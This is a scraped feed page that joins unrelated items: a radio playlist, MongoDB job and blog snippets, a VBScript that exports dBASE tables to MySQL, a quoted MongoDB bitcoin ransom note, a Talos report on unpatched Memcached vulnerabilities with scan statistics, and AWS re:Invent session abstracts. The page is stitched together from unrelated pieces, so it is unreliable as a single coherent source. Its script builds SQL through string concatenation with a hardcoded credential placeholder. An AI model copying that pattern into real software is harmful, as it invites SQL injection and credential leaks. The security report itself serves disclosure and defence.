Del And Dawg- Im Sitting On Top Of The WOrld - Hardcore Bluegrass In The Dawg House
Alison Brown- Lorelei - Replay
- voicebreak -
Hot Club Of Cowtown- The Devil Aint Lazy - What Makes Bob Holler
Captain Planet- Tudo De Bom feat Samira Winter Nevilton - Esperanto Slang
Abelardo Barroso- Macorina with Orquesta Sensacin - Cha Cha Cha with Orquesta Sensacin
King Tuff- Beautiful Thing - Black Moon Spell
Deerhoof- Exit Only - La Isla Bonita
Sallie Ford- Workin The Job - Slap Back
Django Django- Shake Tremble - Born Under Saturn
Snake Rattle Rattle Snake- Hiding In The Pale Walls - Totem
Iron Wine- Kingdom Of Animals - Boy With A Coin
Giant Sand- Hurtin Habit - Heartbreak Pass
Got A Girl- Ill Never Hold You Back - I Love You But I Must Drive Off This Cliff Now
They Might Be Giants- Erase - Glean
Andrew Bird- Drunk By Noon - Things Are Really Great Here Sort Of
Speedy Ortiz- Dot X - Foil Deer
Ambrosia Parsley- Rubble - Weeping Cherry
- voicebreak -
Prinze George- Upswing - Prinze George EP
Panda Bear- Sequential Circuits - Panda Bear Meets The Grim Reaper
John Statz- Tulsa - Tulsa
Gemma Ray- Buckle Up - Milk For Your Motors
- voicebreak -
Panda Bear- Sequential Circuits - Panda Bear Meets The Grim Reaper
Gemma Ray- Buckle Up - Milk For Your Motors
Horse Feathers- Violently Wild - So It Is With Us


playlist URL: http://www.afterfm.com/index.cfm/fuseaction/playlist.listing/showInstanceID/77/playlistDate/2015-06-06
          When to use MongoDB or another document oriented database system?        
We are building a platform for comparing websites on a detailed level. We are using MongoDB to store all the information and it works quite nicely. We use it to store all meta-information of the domains, because MongoDB better fits the requirements. For example: We retrieve different kind of data for every domain so I […]
          Lessons learned for large MongoDB databases        
We are currently developing a system which wants to analyze all the domains in the internet. This is a really challenging task and not easily done in a few months time. Besides loads of problems, like finding so many domains and parsing them in a reasonable amount of time we also implement a MongoDB cluster […]
          Recent work with RelStorage        
Originally posted on Chatterbox, Reloaded:
The KARL project has been focused in the last year on some performance and scalability issues. It’s a reasonably big database, ZODB-atop-RelStorage-atop-PostgreSQL. It’s also heavily security-centric with decent writes, so CDNs and other page caching wasn’t going to help. I personally re-learned the ZODB lesson that the objects needed for…
          [CouchDB-dev] It’s been a great ride. Today I’m moving to MongoDB (Jan Lehnardt)        
Dear Apache CouchDB Community: as of today, I’m stepping down from all offices at the ASF: I’ll step down as Vice President of Apache CouchDB and Apache CouchDB PMC Chair and I’ll resign from the ... -- Jan Lehnardt
          Devops Engineer (Remote or Local) - ICON Health & Fitness, Inc. - Logan, UT        
Experience with MongoDB. Manage and query SQL and MongoDB databases. Remote and/or On-Site....
From ICON Health & Fitness, Inc. - Fri, 09 Jun 2017 00:38:28 GMT - View all Logan, UT jobs
          Javascript Full Stack Developer (Remote or On-site) - ICON Health & Fitness, Inc. - Logan, UT        
Optimize our recommendation engines with aggregate MongoDB queries. IFit's focus is to connect everybody to everything fitness....
From ICON Health & Fitness, Inc. - Wed, 17 May 2017 07:12:02 GMT - View all Logan, UT jobs
          Database Architect - Apple - Santa Clara Valley, CA        
MongoDB, CouchBase, Cassandra. Experience with NOSQL such as MongoDB cassandra or CouchBase. At Apple, we are looking for a passionate Data Services Engineer to...
From Apple - Tue, 01 Aug 2017 13:22:46 GMT - View all Santa Clara Valley, CA jobs
          Senior Oracle DBA for Internet Services - Apple - Santa Clara Valley, CA        
Experience on any of NoSQL data store such as Voldemort, MongoDB and Couchbase. Do you like the idea of running global services that are used by millions of...
From Apple - Tue, 01 Aug 2017 13:22:44 GMT - View all Santa Clara Valley, CA jobs
          Sr. Database Engineer - Apple - Santa Clara Valley, CA        
Production support experience with MongoDB or Vertica. Database engineer will be part of Data services team providing database design, development and...
From Apple - Mon, 10 Jul 2017 13:03:23 GMT - View all Santa Clara Valley, CA jobs
          Sr. Software Engineer, Core Services, Apple Media Products - Apple - Santa Clara Valley, CA        
Experience with one or more of the NoSQL solutions (Memcached / Redis / Voldemort / Cassandra / MongoDB etc.)....
From Apple - Tue, 27 Jun 2017 12:48:45 GMT - View all Santa Clara Valley, CA jobs
          Sr. Software Engineer - Platforms - Apple - Santa Clara Valley, CA        
Oracle, Cassandra and MongoDB experience highly desirable. Imagine what you could do here....
From Apple - Thu, 15 Jun 2017 12:37:13 GMT - View all Santa Clara Valley, CA jobs
          Do stories sell / do good stories survive        
You can only achieve success if you have a story. Nothing sells without stories. Stories sell. Just a few of the sentences I have been hearing over and over in recent years. Stories are what sell. Stories are what excite consumers into opening their wallets and buying something they don't even need. The story is what is decisive …
          Do stories really sell in 2015?        
Do stories really sell in 2015? We often hear sentences like: Nothing sells without stories. Stories are what sell. Stories are what excite consumers into opening their wallets and buying something they don't even need. The story is what tips the scales when you are choosing between two products. Stories simply …
          Compare NoSQL-based AWS database options        
As more cloud databases become available to AWS customers, NoSQL services such as ElastiCache and DynamoDB offer advantages over relational databases.
          MongoDB developer - Agilitics Pte. Ltd. , Dubai, Abu Dhabi, Riyadh, Jeddah, Dammam         
MongoDB Tutorial 
===============
MongoDB course
MySQL vs MongoDB
Connect to MongoDB
Insert and Query Data
MongoDB Schema
Relational Data Browse
Virtual Relations
The Query Builder
Load JSON files into the database


Introduction to MongoDB as well as instructions to import the example dataset;
A brief overview of the MongoDB Shell (mongo);
Basic Insert, Find, Update, Remove operations plus Aggregation;
Instructions on creating Indexes to improve query performance (a quick sketch of these operations follows below).
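
As a rough illustration of the operations listed above, here is a small Python sketch using pymongo, the MongoDB driver for Python. The database and collection names are made up, and it assumes a local mongod on the default port.

# Basic insert, find, update, remove, aggregation and index creation (sketch).
from pymongo import MongoClient, ASCENDING

coll = MongoClient("mongodb://localhost:27017")["tutorial"]["people"]

# Insert
coll.insert_one({"name": "Ada", "city": "London", "age": 36})
coll.insert_many([{"name": "Alan", "city": "London", "age": 41},
                  {"name": "Grace", "city": "New York", "age": 45}])

# Find
for doc in coll.find({"city": "London"}):
    print(doc["name"])

# Update and Remove
coll.update_one({"name": "Ada"}, {"$set": {"age": 37}})
coll.delete_one({"name": "Alan"})

# Aggregation: count people per city
for row in coll.aggregate([{"$group": {"_id": "$city", "n": {"$sum": 1}}}]):
    print(row)

# Index to speed up the city queries
coll.create_index([("city", ASCENDING)])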


          "Export Dbase into MYSQL (no replies)        
I just spent quite a bit of time creating a SUB that maintains field names and most types/formatting. It uses ADODB connections to create the database in MySQL and loop through the DBF resultset, inserting the values into the MySQL database. As it is, this will need modification for any date values within strVals. It works well for me so far. Here's the script:

Sub ExportDBFtoMYSQL

'=================ADODB Constants==============
Const adOpenStatic = 3
Const adLockOptimistic = 3
Const adOpenKeyset = 1
Const adLockReadOnly = 1
Const adOpenForwardOnly = 0

'============MYSQL SERVER VALUES============
MYSQLSVR = "localhost"
MYSQLUSERNAME = "root"
MYSQLPWD = "mypwd"
MYSQLDB = "mrp"
MYSQLPORT = "3306"

'==================DBF VALUES=================
DBFPath = CurrentDocument.Path
DBFName = "parts"
DBFKey = "IN_HOUSE_S"

'Connect to DBF=================================
Set DBFconn=CreateObject("ADODB.Connection")
Set DBFRS = CreateObject("ADODB.Recordset")
DBFconn.Open "Driver={Microsoft dBASE Driver (*.dbf)};DriverID=277;Dbq=" & DBFPath
DBFstrSQL = "SELECT * FROM " & DBFName
DBFRS.Open DBFstrSQL,DBFconn, 0,3

'BUILD MYSQL Col String==============================
i = 0
Do Until i = DBFRS.Fields.Count
'ADO type 2 = adSmallInt
If DBFRS.Fields(i).Type = 2 Then
StrCol = StrCol & DBFRS.Fields(i).Name &" SMALLINT(" & DBFRS.Fields(i).DefinedSize & ") DEFAULT NULL, "
strRSCols = strRSCols & "`" & DBFRS.Fields(i).Name & "`" & ","
End If
'ADO type 5 = adDouble
If DBFRS.Fields(i).Type = 5 Then
StrCol = StrCol & DBFRS.Fields(i).Name &" Numeric(10,4) DEFAULT NULL, "
strRSCols = strRSCols & "`" & DBFRS.Fields(i).Name & "`" & ","
End If
'ADO type 200 = adVarChar
If DBFRS.Fields(i).Type = 200 Then
StrCol = StrCol & DBFRS.Fields(i).Name & " VARCHAR(" & DBFRS.Fields(i).DefinedSize & ") DEFAULT NULL, "
strRSCols = strRSCols & "`" & DBFRS.Fields(i).Name & "`" & ","
End If
'ADO type 11 = adBoolean
If DBFRS.Fields(i).Type = 11 Then
StrCol = StrCol & DBFRS.Fields(i).Name & " BIT(1) DEFAULT NULL, "
strRSCols = strRSCols & "`" & DBFRS.Fields(i).Name & "`" & ","
End If
'ADO type 133 = adDBDate
If DBFRS.Fields(i).Type = 133 Then
StrCol = StrCol & DBFRS.Fields(i).Name & " DATE DEFAULT NULL, "
strRSCols = strRSCols & "`" & DBFRS.Fields(i).Name & "`" & ","
End If
'ADO type 201 = adLongVarChar (memo)
If DBFRS.Fields(i).Type = 201 Then
StrCol = StrCol & DBFRS.Fields(i).Name & " MEDIUMTEXT, "
strRSCols = strRSCols & "`" & DBFRS.Fields(i).Name & "`" & ","
End If
i=i+1
Loop

'Fix MYSQL RSCOL string==================================================
strRSCols = Left(strRSCols,Len(strRSCols)-1) & ")"

'Connect To MYSQL====================================
Set MYSQLConn = CreateObject("ADODB.Connection")
Set MYSQLRS = CreateObject("ADODB.Recordset")
MYSQLstrSQL = "SELECT * FROM " & DBFName
StrMYSQLConn ="Driver=MySQL ODBC 5.3 ANSI Driver;" &_
"SERVER=" & MYSQLSVR &";" &_
"UID=" & MYSQLUSERNAME &";" &_
"PASSWORD=" & MYSQLPWD &";" &_
"DATABASE=" & MYSQLDB & ";" &_
"PORT=" & MYSQLPORT


MYSQLConn.Open StrMYSQLConn

'BUILD MYSQL Create Table String=====================
MYSQLStrExe = "CREATE TABLE " & DBFName & " (" & StrCol & _
"PRIMARY KEY " & DBFName & "_idx1 (" & DBFKey & ")" &_
") ENGINE=InnoDB DEFAULT CHARSET=utf8;"

'EXECUTE MYSQL Create Table====================
MYSQLconn.Execute MYSQLStrExe

'OPEN New MYSQL Table=====================
MYSQLRS.Open MYSQLstrSQL,MYSQLConn, 0,3

'Enter The Data=====================================
If DBFRS.EOF = False Then

SelInto = "INSERT IGNORE INTO " & MYSQLDB & "." & DBFName & "("
i = 0
Do Until DBFRS.EOF = True
strVals = ""
Do Until i = DBFRS.Fields.Count
strVals = strVals & |"| & DBFRS.Fields(i).Value & |"| & ","
i = i + 1
Loop
i = 0

'Print DBFRS.Fields("recid").Value
strVals = Left(strVals,Len(strVals)-1) & ")"
'Print strVals
'Print SelInto & strRSCols & " values" & "(" & strVals

MYSQLconn.Execute SelInto & strRSCols & " values" & "(" & strVals
DBFRS.MoveNext
Loop
End If

MYSQLRS.Close
Set MYSQLRS = Nothing
MYSQLConn.Close
Set MYSQLConn = Nothing

DBFRS.Close
Set DBFRS = Nothing
DBFconn.close
Set DBFconn = Nothing
End Sub
          MongoDb hacked - Upwork        
Just got the message that all my data in mongodb is gone with the message:

Your DataBase is downloaded and backed up on our secured servers. To recover your lost data:Send 0.2 BTC to our BitCoin Address and Contact us by eMail with your MongoDB server IP Address and a Proof of Payment. Any eMail without your MongoDB server IP Address and a Proof of Payment together will be ignored. You are welcome!

I am not sure if there is any way to recover it?


Posted On: August 10, 2017 21:14 UTC
Category: IT & Networking > Database Administration
Country: Netherlands
click to apply
          MongoDB 3 Succinctly        

MongoDB is one of the biggest players in the NoSQL database market, providing high performance, high availability, and automatic scaling. It’s an open-source document database written in C++ and hosted on GitHub. Zoran Maksimovic’s MongoDB 3 Succinctly touches on the most important aspects of the MongoDB database that application developers should be aware of—from installation […]


          NoSQL: Amazon’s DynamoDB and Apache HBase Performance and Modeling notes        
The challenge that architects and developers face today is how to process large volumes of data in a timely, cost-effective, and reliable manner. There are several NoSQL solutions in the market today, and choosing the right one for your … Continue reading
          Memcached - A Story of Failed Patching & Vulnerable Servers        
This blog authored by Aleksandar Nikolich and David Maynor with contributions from Nick Biasini

Memcached - Not secure, Not Patched Fast Enough

 

Recently, high-profile vulnerabilities in systems were used to unleash several global ransomware attacks that greatly impacted organizations. These vulnerabilities had already been patched and could have been addressed by organizations before the attacks commenced. This is just the latest example in a long line of threats that succeed in large part because patches are not applied in a timely and effective manner. In late 2016 Talos disclosed a series of vulnerabilities in a software platform called Memcached. Since releasing the vulnerabilities, Talos has been monitoring how many systems remain vulnerable and the rate at which they are being patched. This blog gives a quick overview of the vulnerabilities and discusses the unfortunate findings of the Internet-wide scans that we have been conducting over the last six months.

What is Memcached?


Memcached is a high-performance object caching server intended to speed up dynamic web applications, and it is used by some of the most popular Internet websites. It has two versions of the protocol for storing and retrieving arbitrary data: an ASCII-based one and a binary one. The binary protocol is optimized for size.

Its intended use is to be accessed by the web application servers, and it should never, under any circumstances, be exposed to an untrusted environment. Newer versions of the server include basic authentication support based on SASL which, based on our findings, is seldom used.
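
To make concrete why an exposed, unauthenticated instance is such a problem, here is a small Python sketch of the ASCII protocol: a few plain-text commands are all it takes to read and write the cache. It assumes a memcached instance listening on localhost:11211 and is only a protocol illustration, not the scanning tool described later in this post.

# Minimal ASCII-protocol sketch against a local memcached instance.
import socket

with socket.create_connection(("127.0.0.1", 11211)) as s:
    s.sendall(b"version\r\n")                        # e.g. b"VERSION 1.4.25\r\n"
    print(s.recv(256))
    payload = b"secret"
    s.sendall(b"set token 0 0 %d\r\n%s\r\n" % (len(payload), payload))
    print(s.recv(256))                               # b"STORED\r\n"
    s.sendall(b"get token\r\n")
    print(s.recv(256))                               # VALUE token 0 6 / secret / END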

Audit and Vulnerabilities


In October last year, we performed a source code audit of the Memcached server and identified three distinct but similar vulnerabilities. All three are in the implementation of the binary protocol. Two vulnerabilities lie in the part of the code dealing with adding and updating cached objects, while the third is in the aforementioned SASL authentication mechanism. All three vulnerabilities are due to integer overflows leading to controlled heap buffer overflows and, due to the nature of the protocol, can be abused for sensitive memory disclosure, which can lead to straightforward and reliable exploitation.

The vendor was notified and promptly issued a patch that we have verified as sufficient. The new patched version was publicly released on October 31st. The CVE ID assigned to this vulnerability is CVE-2016-8704, and it was tracked by us as TALOS-2016-0219. Soon after the public release, major Linux distributions issued updates and advisories of their own. One key thing to note is that major distributions (Ubuntu, Fedora...) backported patches without bumping the version number of the server.

MongoDB attacks of January 2017


A slight detour. Sometime in late December/early January news of a widespread attack on MongoDB servers surfaced.

MongoDB is a NoSQL document database. Like memcached, it is never supposed to be exposed to an untrusted environment, which is often overlooked by developers, and sometimes production servers end up freely accessible over the Internet.

It is a well-known fact that many thousands of MongoDB servers are exposed on the Internet, but some criminal groups decided to weaponize this fact for profit, aided by the lack of any form of authentication or access control. In a matter of days, thousands of these accessible MongoDB hosts were hit with a ransomware attack.

Essentially, the bad guys connected to the server, siphoned all the data off of it, and left a note requesting a certain amount of bitcoin as ransom for the data. Soon it became apparent that multiple competing groups were attacking the same servers, which leads to the conclusion that there is no hope of actually recovering the data, if there ever was in the first place.

These attacks had a widespread media coverage which certainly led to higher awareness of this issue, and hopefully to less servers being exposed.

Could Memcached face a similar fate?


This whole MongoDB kerfuffle made us think about the impact of a similar attack on memcached. Granted, memcached, unlike MongoDB, isn't a database, but it can still contain sensitive information, and disruption of its availability would certainly lead to further disruptions in dependent services. Additionally, we could assess the potential attack surface for the vulnerabilities we found, as well as see how widely the patch has been applied.

So we decided to scan the Internet and see...

Scans


In order to properly get the data we needed, a special scan had to be performed. We wanted a couple of data points:

  • how many servers are directly accessible over internet
  • how many of those are still vulnerable
  • how many use authentication
  • how many of servers with authentication enabled are still vulnerable

We couldn't rely on the version reported by the server because, as mentioned before, many distributions backport security patches, so the version string doesn't always reflect the patch level. Because of that, we devised a special test which would send a single packet to the server and tell from the reply whether the server was vulnerable or not.

The first series of scans was conducted in late February. This first dataset led to another scan, specifically for authentication-enabled servers, which was done in early March.

Results Of The Scans


Gathering all the data revealed mostly expected results: more than 100,000 accessible servers, with almost 80% still vulnerable and only about 22% having authentication enabled. Interestingly, almost all servers with authentication enabled were still found to be vulnerable to CVE-2016-8706, which we specifically tested for. The exact numbers are as follows:

  • Total servers with valid responses: 107786
  • Total servers still vulnerable: 85121 (~79%)
  • Total servers not vulnerable: 22665 (~21%)
  • Total servers requiring authentication: 23907 (~22%)
  • Total vulnerable servers requiring authentication: 23707 (~99%)

Breakdown of numbers by country is, again, as expected:
All servers:
  1. 36937 - United States
  2. 18878 - China
  3. 5452 - United Kingdom
  4. 5314 - France
  5. 3901 - Russia
  6. 3698 - Germany
  7. 3607 - Japan
  8. 3464 - India
  9. 3287 - Netherlands
  10. 2443 - Canada

Vulnerable servers:
  1. 29660 - United States
  2. 16917 - China
  3. 4713 - United Kingdom
  4. 3209 - France
  5. 3047 - Germany
  6. 3003 - Japan
  7. 2556 - Netherlands
  8. 2460 - India
  9. 2266 - Russia
  10. 1820 - Hong Kong
There are a couple of conclusions that can be drawn from this. First, there is a large number of easily accessible memcached servers on the Internet. Second, less than a quarter have authentication enabled, making the rest fully open to abuse even in the absence of exploitable remote code execution vulnerabilities. Third, people are slow to patch their existing servers, which leaves a large number of servers at risk of full compromise through the vulnerabilities we reported. And fourth, a negligible number of servers with authentication enabled are also patched, leading to the conclusion that system administrators think authentication is enough and that patches don't warrant updating. All four of these points are bad.

Notifications


After the scans were completed and conclusions were drawn, we made queries for all IP addresses to get contact emails for the responsible organizations, in order to send a notification with a simple explanation and suggestions to remedy this issue. This resulted in about 31 thousand unique emails which are pending notifications.

Redoing scans


After the notifications were sent, we repeated the scans six months later to see if they had any significant impact. Overall the results were disappointing; it appears the notifications largely fell on deaf ears. As you can see below, only a small percentage, ~10%, of systems were patched. Additionally, there is still a significant number of servers that are vulnerable and still do not require authentication. What's even more disturbing is that about 26% of the servers that were originally found are no longer online, yet the number of systems we found remained largely the same. This implies that either the systems just changed IP addresses or a large number of new systems are still being deployed with the vulnerable version of Memcached.

Results: 6 Months Later

  • Total servers with valid responses: 106001
  • Total servers still vulnerable: 73403 (~69%)
  • Total servers not vulnerable: 32598 (~30%)
  • Total servers requiring authentication: 18173 (~17%)
  • Total vulnerable servers requiring authentication: 18012 (~99%)

Results: Original Servers (107,786), Updated

  • Total originally vulnerable: 85,121
  • Still vulnerable: 53,621
  • No longer vulnerable: 2,958
  • Not online: 28,542 (~26%)

Conclusion


The severity of these types of vulnerabilities cannot be overstated. These vulnerabilities potentially affect a platform that is deployed across the internet by small and large enterprises alike. With the recent spate of worm attacks leveraging vulnerabilities, this should be a red flag for administrators around the world. If left unaddressed, the vulnerabilities could be leveraged to impact organizations globally and impact business severely. It is highly recommended that these systems be patched immediately to help mitigate the risk to organizations.


                    [Hands-on] Crawling iask (Sina iAsk) questions and importing them into a MongoDB database        
          Straight to the source code: https://github.com/huahuizi/Iask-crawl
                    The problem of uploadify sending an extra request        
          When uploading images with the uploadify upload control, I found that once uploadify.swf has finished loading, it sends one more request; […]
                    Book: EODB, Ease of Starting a Business for Small and Medium Enterprises        
          4 May 2017. Book: EODB, Ease of Starting a Business for Small and Medium Enterprises. For readers who have not yet been able to obtain the printed version of the book, a soft copy is available here. Hopefully it helps readers in doing business. TABLE OF CONTENTS: STARTING A BUSINESS; GOVERNMENT REGULATION NUMBER 7 […]
                    Tech Junkie Blog: AngularJS SPA Part 5: Create a MongoDB Configuration File        
          Here are the steps: dbpath specifies the path of the data files; logpath specifies the path of the log file; verbose specifies how verbose we want our log files to be, and in this case we want our log files to be very verbose because we want to log everything. The setting goes from v to […]
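
If it helps to see those options side by side, here is a minimal sketch of a legacy INI-style mongod configuration file. The paths are placeholders and the exact spelling of the verbosity option can vary between MongoDB versions, so treat this as illustrative rather than definitive.

# example mongod.conf covering the options named in the post
# (legacy INI-style syntax; check the docs for your MongoDB version)
# where the data files live
dbpath = /var/lib/mongodb
# where the log file goes
logpath = /var/log/mongodb/mongod.log
logappend = true
# maximum verbosity, the post's "from v to vvvvv"
vvvvv = true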
                    AWS re:Invent 2016 Video & Slide Presentation Links with Easy Index        
          As with last year, here is my quick index of all re:Invent sessions. I'll keep running the tool to fill in the index. It usually takes Amazon a few weeks to fully upload all the videos and presentations. This year it looks like Amazon got the majority of the content onto YouTube and SlideShare very quickly, with a few SlideShare decks still trickling in.

          See below for how I created the index (with code):


          ALX201 - How Capital One Built a Voice-Based Banking Skill for Amazon Echo
          As we add thousands of skills to Alexa, our developers have uncovered some basic and more complex tips for building better skills. Whether you are new to Alexa skill development or if you have created skills that are live today, this session helps you understand how to create better voice experiences. Last year, Capital One joined Alexa on stage at re:Invent to talk about their experience building an Alexa skill. Hear from them one year later to learn from the challenges that they had to overcome and the results they are seeing from their skill. In this session, you will learn the importance of flexible invocations, better VUI design, how OAuth and account linking can add value to your skill, and about Capital One's experience building an Alexa skill.
          ALX202 - How Amazon is enabling the future of Automotive
          The experience in the auto industry is changing. For both the driver and the car manufacturer, a whole new frontier is on the near horizon. What do you do with your time while the car is driving itself? How do I have a consistent experience while driving shared or borrowed cars? How do I stay safer and more aware in the ever increasing complexity of traffic, schedules, calls, messages and tweets? In this session we will discuss how the auto industry is facing new challenges and how the use of Amazon Alexa, IoT, Logistics services and the AWS Cloud is transforming the Mobility experience of the (very near) future.
          ALX203 - Workshop: Creating Voice Experiences with Alexa Skills: From Idea to Testing in Two Hours
          This workshop teaches you how to build your first voice skill with Alexa. You bring a skill idea and we'll show you how to bring it to life. This workshop will walk you through how to build an Alexa skill, including Node.js setup, how to implement an intent, deploying to AWS Lambda, and how to register and test a skill. You'll walk out of the workshop with a working prototype of your skill idea. Prerequisites: Participants should have an AWS account established and available for use during the workshop. Please bring your own laptop.
          ALX204 - Workshop: Build an Alexa-Enabled Product with Raspberry Pi
          Fascinated by Alexa, and want to build your own device with Alexa built in? This workshop will walk you through to how to build your first Alexa-powered device step by step, using a Raspberry Pi. No experience with Raspberry Pi or Alexa Voice Service is required. We will provide you with the hardware and the software required to build this project, and at the end of the workshop, you will be able to walk out with a working prototype of Alexa on a Pi. Please bring a WiFi capable laptop.
          ALX301 - Alexa in the Enterprise: How JPL Leverages Alexa to Further Space Exploration with Internet of Things
          The Jet Propulsion Laboratory designs and creates some of the most advanced space robotics ever imagined. JPL IT is now innovating to help streamline how JPLers will work in the future in order to design, build, operate, and support these spacecraft. They hope to dramatically improve JPLers' workflows and make their work easier for them by enabling simple voice conversations with the room and the equipment across the entire enterprise. What could this look like? Imagine just talking with the conference room to configure it. What if you could kick off advanced queries across AWS services and kick off AWS Kinesis tasks by simply speaking the commands? What if the laboratory could speak to you and warn you about anomalies or notify you of trends across your AWS infrastructure? What if you could control rovers by having a conversation with them and ask them questions? In this session, JPL will demonstrate how they leveraged AWS Lambda, DynamoDB and CloudWatch in their prototypes of these use cases and more. They will also discuss some of the technical challenges they are overcoming, including how to deploy and manage consumer devices such as the Amazon Echo across the enterprise, and give lessons learned. Join them as they use Alexa to query JPL databases, control conference room equipment and lights, and even drive a rover on stage, all with nothing but the power of voice!
          ALX302 - Build a Serverless Back End for Your Alexa-Based Voice Interactions
          Learn how to develop voice-based serverless back ends for Alexa Voice Service (AVS) and Alexa devices using the Alexa Skills Kit (ASK), which allows you to add new voice-based interactions to Alexa. We'll code a new skill, implemented by a serverless backend leveraging AWS services such as Amazon Cognito, AWS Lambda, and Amazon DynamoDB. Often, your skill needs to authenticate your users, link them back to your backend systems, and persist state between user invocations. User authentication is performed by leveraging OAuth-compatible identity systems. Running such a system on your back end requires undifferentiated heavy lifting or boilerplate code. We'll leverage Login with Amazon as the identity provider instead, allowing you to focus on your application implementation and not on the low-level user management parts. At the end of this session, you'll be able to develop your own Alexa skills and use Amazon and AWS services to minimize the required backend infrastructure. This session shows you how to deploy your Alexa skill code on a serverless infrastructure, leverage AWS Lambda, use Amazon Cognito and Login with Amazon to authenticate users, and leverage Amazon DynamoDB as a fully managed NoSQL data store.
          ALX303 - Building a Smarter Home with Alexa
          Natural user interfaces, such as those based on speech, enable customers to interact with their home in a more intuitive way. With the VUI (Voice User Interface) smart home, now customers don't need to use their hands or eyes to do things around the home they only have to ask and it's at their command. This session will address the vision for the VUI smart home and how innovations with Amazon Alexa make it possible.
          ALX304 - Tips and Tricks on Bringing Alexa to Your Products
          Ever wonder what it takes to add the power of Alexa to your own products? Are you curious about what Alexa partners have learned on their way to a successful product launch? In this session you will learn about the top tips and tricks on how to go from VUI newbie to an Alexa-enabled product launch. Key concepts around hardware selection, enabling far field voice interaction, building a robust Alexa Voice Service (AVS) client and more will be discussed along with customer and partner examples on how to plan for and avoid common challenges in product design, development and delivery.
          ALX305 - From VUI to QA: Building a Voice-Based Adventure Game for Alexa
          Hitting the submit button to publish your skill is similar to sending your child to their first day of school. You want it to be set up for a successful launch day and for many days thereafter. Learn how to set your skill up for success from Andy Huntwork, Alexa Principal Engineer and one of the creators of the popular Alexa skill The Magic Door. You will learn the most common reasons why skills fail and also some of the more unique use cases. The purpose of this session is to help you build better skills by knowing what to look out for and what you can test for before submitting. In this session, you will learn what most developers do wrong, how to successfully test and QA your skill, how to set your skill up for successful certification, and the process of how a skill gets certified.
          ALX306 - State of the Union: Amazon Alexa and Recent Advances in Conversational AI
          The way humans interact with machines is at a turning point, and conversational artificial intelligence (AI) is at the center of the transformation. Learn how Amazon is using machine learning and cloud computing to fuel innovation in AI, making Amazon Alexa smarter every day. Alexa VP and Head Scientist Rohit Prasad presents the state of the union for Alexa and recent advances in conversational AI. He addresses Alexa's advances in spoken language understanding and machine learning, and shares Amazon's thoughts about building the next generation of user experiences.
          ALX307 - Voice-enabling Your Home and Devices with Amazon Alexa and AWS IoT
          Want to learn how to Alexa-power your home? Join Brookfield Residential CIO and EVP Tom Wynnyk and Senior Solutions Architect Nathan Grice (Alexa Smart Home) for an overview of building the next generation of integrated smart homes using Alexa to create voice-first experiences. Understand the technologies used and how to best expose voice experiences to users through Alexa. They cover the difference between custom Alexa skills and Smart Home Skill API skills, and build a home automation control from the ground up using Alexa and AWS IoT.
          ARC201 - Scaling Up to Your First 10 Million Users
          Cloud computing gives you a number of advantages, such as the ability to scale your web application or website on demand. If you have a new web application and want to use cloud computing, you might be asking yourself, "Where do I start?" Join us in this session to understand best practices for scaling your resources from zero to millions of users. We show you how to best combine different AWS services, how to make smarter decisions for architecting your application, and how to scale your infrastructure in the cloud.
          ARC202 - Accenture Cloud Platform Serverless Journey
          Accenture Cloud Platform helps customers manage public and private enterprise cloud resources effectively and securely. In this session, learn how we designed and built new core platform capabilities using a serverless, microservices-based architecture that is based on AWS services such as AWS Lambda and Amazon API Gateway. During our journey, we discovered a number of key benefits, including a dramatic increase in developer velocity, a reduction (to almost zero) of reliance on other teams, reduced costs, greater resilience, and scalability. We describe the (wild) successes we've had and the challenges we've overcome to create an AWS serverless architecture at scale. Session sponsored by Accenture. AWS Competency Partner
          ARC203 - Achieving Agility by Following Well-Architected Framework Principles on AWS
          The AWS Well-Architected Framework enables customers to understand best practices around security, reliability, performance, and cost optimization when building systems on AWS. This approach helps customers make informed decisions and weigh the pros and cons of application design patterns for the cloud. In this session, you'll learn how National Instruments used the Well-Architected Framework to follow AWS guidelines and best practices. By developing a strategy based on the AWS Well-Architected Framework, National Instruments was able to triple the number of applications running in the cloud without additional head count, significantly increase the frequency of code deployments, and reduce deployment times from two weeks to a single day. As a result, National Instruments was able to deliver a more scalable, dynamic, and resilient LabVIEW platform with agility.
          ARC204 - From Resilience to Ubiquity - #NetflixEverywhere Global Architecture
          Building and evolving a pervasive, global service requires a multi-disciplined approach that balances requirements with service availability, latency, data replication, compute capacity, and efficiency. In this session, we'll follow the Netflix journey of failure, innovation, and ubiquity. We'll review the many facets of globalization and then delve deep into the architectural patterns that enable seamless, multi-region traffic management; reliable, fast data propagation; and efficient service infrastructure. The patterns presented will be broadly applicable to internet services with global aspirations.
          ARC205 - Born in the Cloud; Built Like a Startup
          This presentation provides a comparison of three modern architecture patterns that startups are building their business around. It includes a realistic analysis of cost, team management, and security implications of each approach. It covers Elastic Beanstalk, Amazon ECS, Docker, Amazon API Gateway, AWS Lambda, Amazon DynamoDB, and Amazon CloudFront.
          ARC207 - NEW LAUNCH! Additional transparency and control for your AWS environment through AWS Personal Health Dashboard
          When your business is counting on the performance of your cloud solutions, having relevant and timely insights into events impacting your AWS resources is essential. AWS Personal Health Dashboard serves as the primary destination for you to receive personalized information related to your AWS infrastructure, guiding you through scheduled changes and accelerating the troubleshooting of issues impacting your AWS resources. The service, powered by AWS Health APIs, integrates with your in-house event management systems, and can be programmatically configured to proactively get the right information into the right hands at the right time. The service is integrated with Splunk App for AWS to enhance Splunk's dashboards, reports and alerts to deliver real-time visibility into your environment.
          ARC208 - Hybrid Architectures: Bridging the Gap to the Cloud
          AWS provides many services to assist customers with their journey to the cloud. Hybrid solutions offer customers a way to continue leveraging existing investments on-premises, while expanding their footprint into the public cloud. This session covers the different technologies available to support hybrid architectures on AWS. We discuss common patterns and anti-patterns for solving enterprise workloads across a hybrid environment.
          ARC209 - Attitude of Iteration
          In today's world, technology changes at a breakneck speed. What was new this morning is outdated at lunch. Working in the AWS Cloud is no different. Every week, AWS announces new features or improvements to current products. As AWS technologists, we must assimilate these new technologies and make decisions to adopt, reject, or defer. These decisions can be overwhelming: we tend to either reject everything and become stagnant, or adopt everything and never get our project out the door. In this session we will discuss the attitude of iteration. The attitude of iteration allows us to face the challenges of change without overwhelming our technical teams with a constant tug-o-war between implementation and improvement. Whether you're an architect, engineer, developer, or AWS newbie, prepare to laugh, cry, and commiserate as we talk about overcoming these challenges. Session sponsored by Rackspace.
          ARC210 - Workshop: Addressing Your Business Needs with AWS
          Come and participate with other AWS customers as we focus on the overall experience of using AWS to solve business problems. This is a great opportunity to collaborate with existing and prospective AWS users to validate your thinking and direction with AWS peers, discuss the resources that aid AWS solution design, and give direct feedback on your experience building solutions on AWS.
